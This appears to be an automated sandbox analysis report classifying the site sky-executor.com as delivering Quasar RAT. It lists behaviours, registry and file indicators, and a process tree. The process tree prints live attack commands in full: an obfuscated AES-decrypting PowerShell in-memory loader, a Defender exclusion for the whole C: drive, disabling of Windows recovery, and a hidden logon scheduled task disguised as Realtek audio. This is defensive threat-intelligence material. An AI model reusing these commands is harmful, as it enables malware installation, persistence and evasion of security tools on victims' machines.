quasar | hxxps://sky-executor[.]com/

Analysis

max time kernel
95s
max time network
95s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250128-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
02-02-2025 02:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://sky-executor.com/

Score

10^/10

quasar discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

��0 �,^^l��

Mutex

o��.��\RU�i�

Attributes

reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/2032-185-0x000001A145A80000-0x000001A145E42000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

flow	pid	Process
44	2032	powershell.exe
46	2032	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1568	powershell.exe
4316	powershell.exe
736	powershell.exe
3384	powershell.exe
3688	powershell.exe
3264	powershell.exe
2032	powershell.exe
756	powershell.exe
644	powershell.exe
1036	powershell.exe
1996	powershell.exe
1392	powershell.exe
1684	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2566122449-2538968884-464987429-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2566122449-2538968884-464987429-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe

Drops file in Windows directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133829358372833468"	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2566122449-2538968884-464987429-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2566122449-2538968884-464987429-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2566122449-2538968884-464987429-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
2044	chrome.exe
2044	chrome.exe
3264	powershell.exe
3264	powershell.exe
3264	powershell.exe
2044	chrome.exe
2044	chrome.exe
644	powershell.exe
644	powershell.exe
644	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
1036	powershell.exe
1036	powershell.exe
1036	powershell.exe
756	powershell.exe
756	powershell.exe
756	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
3384	powershell.exe
3384	powershell.exe
3384	powershell.exe
1392	powershell.exe
1392	powershell.exe
1392	powershell.exe
1568	powershell.exe
1568	powershell.exe
1568	powershell.exe
3688	powershell.exe
3688	powershell.exe
3688	powershell.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2044	chrome.exe
2044	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2032	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2044 wrote to memory of 3712	2044	chrome.exe	83
PID 2044 wrote to memory of 3712	2044	chrome.exe	83
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 3536	2044	chrome.exe	84
PID 2044 wrote to memory of 792	2044	chrome.exe	85
PID 2044 wrote to memory of 792	2044	chrome.exe	85
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86
PID 2044 wrote to memory of 556	2044	chrome.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://sky-executor.com/
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1cc,0x228,0x7ffdbb13cc40,0x7ffdbb13cc4c,0x7ffdbb13cc58
  2⤵
  PID:3712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2108,i,17376673302824440822,10048411269873864537,262144 --variations-seed-version=20250127-050148.939000 --mojo-platform-channel-handle=2104 /prefetch:2
  2⤵
  PID:3536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1548,i,17376673302824440822,10048411269873864537,262144 --variations-seed-version=20250127-050148.939000 --mojo-platform-channel-handle=2140 /prefetch:3
  2⤵
  PID:792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,17376673302824440822,10048411269873864537,262144 --variations-seed-version=20250127-050148.939000 --mojo-platform-channel-handle=2432 /prefetch:8
  2⤵
  PID:556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,17376673302824440822,10048411269873864537,262144 --variations-seed-version=20250127-050148.939000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,17376673302824440822,10048411269873864537,262144 --variations-seed-version=20250127-050148.939000 --mojo-platform-channel-handle=3188 /prefetch:1
  2⤵
  PID:2400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4676,i,17376673302824440822,10048411269873864537,262144 --variations-seed-version=20250127-050148.939000 --mojo-platform-channel-handle=3764 /prefetch:8
  2⤵
  PID:116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5208,i,17376673302824440822,10048411269873864537,262144 --variations-seed-version=20250127-050148.939000 --mojo-platform-channel-handle=5244 /prefetch:8
  2⤵
  PID:2272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5240,i,17376673302824440822,10048411269873864537,262144 --variations-seed-version=20250127-050148.939000 --mojo-platform-channel-handle=5216 /prefetch:8
  2⤵
  PID:4648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5212,i,17376673302824440822,10048411269873864537,262144 --variations-seed-version=20250127-050148.939000 --mojo-platform-channel-handle=5244 /prefetch:8
  2⤵
  PID:628

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2604

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\908ed862-fd54-4dce-9d07-e7735d2fe382_ijxc5u5xgmq.zip.382\SkyEx.bat" "
1⤵
PID:2540
- C:\Windows\system32\net.exe
  net file
  2⤵
  PID:3440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:3492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NK6bq8FTaxkS+8MUh8Y/Oy9u1+T3SxyOrCm5Piq2uFU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PqRgyhlZl/qIszxCOfOwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GtoBs=New-Object System.IO.MemoryStream(,$param_var); $qTHmx=New-Object System.IO.MemoryStream; $BrbIX=New-Object System.IO.Compression.GZipStream($GtoBs, [IO.Compression.CompressionMode]::Decompress); $BrbIX.CopyTo($qTHmx); $BrbIX.Dispose(); $GtoBs.Dispose(); $qTHmx.Dispose(); $qTHmx.ToArray();}function execute_function($param_var,$param2_var){ $bcVJf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DxlNL=$bcVJf.EntryPoint; $DxlNL.Invoke($null, $param2_var);}$uXxHb = 'C:\Users\Admin\AppData\Local\Temp\908ed862-fd54-4dce-9d07-e7735d2fe382_ijxc5u5xgmq.zip.382\SkyEx.bat';$host.UI.RawUI.WindowTitle = $uXxHb;$XQMBy = [type]::GetType('System.IO.File');$FgQjL = [type]::GetType('System.Environment');$tmYtz = $XQMBy::('txeTllAdaeR'[-1..-11] -join '')($uXxHb);$boaBv = $FgQjL::NewLine;$RlMCC = $tmYtz.Split($boaBv);$kAnVS = $RlMCC;foreach ($XiygM in $kAnVS) { if ($XiygM.StartsWith(':: ')) { $RyZZZ=$XiygM.Substring(3); break; }}$payloads_var=[string[]]$RyZZZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3264
- - C:\Windows\system32\reagentc.exe
    "reagentc.exe" /disable
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:2144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\ngkzs5rn0az8.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4316
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\ngkzs5rn0az8.vbs"
    3⤵
    - Checks computer location settings
    PID:5104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\ngkzs5rn0az8.bat" "
      4⤵
      PID:2552
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        
        PID:2404
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:3468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NK6bq8FTaxkS+8MUh8Y/Oy9u1+T3SxyOrCm5Piq2uFU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PqRgyhlZl/qIszxCOfOwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GtoBs=New-Object System.IO.MemoryStream(,$param_var); $qTHmx=New-Object System.IO.MemoryStream; $BrbIX=New-Object System.IO.Compression.GZipStream($GtoBs, [IO.Compression.CompressionMode]::Decompress); $BrbIX.CopyTo($qTHmx); $BrbIX.Dispose(); $GtoBs.Dispose(); $qTHmx.Dispose(); $qTHmx.ToArray();}function execute_function($param_var,$param2_var){ $bcVJf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DxlNL=$bcVJf.EntryPoint; $DxlNL.Invoke($null, $param2_var);}$uXxHb = 'C:\Users\Admin\AppData\Local\Realtek-Hub\ngkzs5rn0az8.bat';$host.UI.RawUI.WindowTitle = $uXxHb;$XQMBy = [type]::GetType('System.IO.File');$FgQjL = [type]::GetType('System.Environment');$tmYtz = $XQMBy::('txeTllAdaeR'[-1..-11] -join '')($uXxHb);$boaBv = $FgQjL::NewLine;$RlMCC = $tmYtz.Split($boaBv);$kAnVS = $RlMCC;foreach ($XiygM in $kAnVS) { if ($XiygM.StartsWith(':: ')) { $RyZZZ=$XiygM.Substring(3); break; }}$payloads_var=[string[]]$RyZZZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2032
      - C:\Windows\system32\reagentc.exe
        
        "reagentc.exe" /disable
        6⤵
        Drops file in Windows directory
        
        PID:2908
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\29d329b6-f5cc-4388-82b5-22858b06dabe_ijxc5u5xgmq.zip.abe\SkyEx.bat" "
1⤵
PID:3896
- C:\Windows\system32\net.exe
  net file
  2⤵
  PID:5020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:2440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NK6bq8FTaxkS+8MUh8Y/Oy9u1+T3SxyOrCm5Piq2uFU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PqRgyhlZl/qIszxCOfOwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GtoBs=New-Object System.IO.MemoryStream(,$param_var); $qTHmx=New-Object System.IO.MemoryStream; $BrbIX=New-Object System.IO.Compression.GZipStream($GtoBs, [IO.Compression.CompressionMode]::Decompress); $BrbIX.CopyTo($qTHmx); $BrbIX.Dispose(); $GtoBs.Dispose(); $qTHmx.Dispose(); $qTHmx.ToArray();}function execute_function($param_var,$param2_var){ 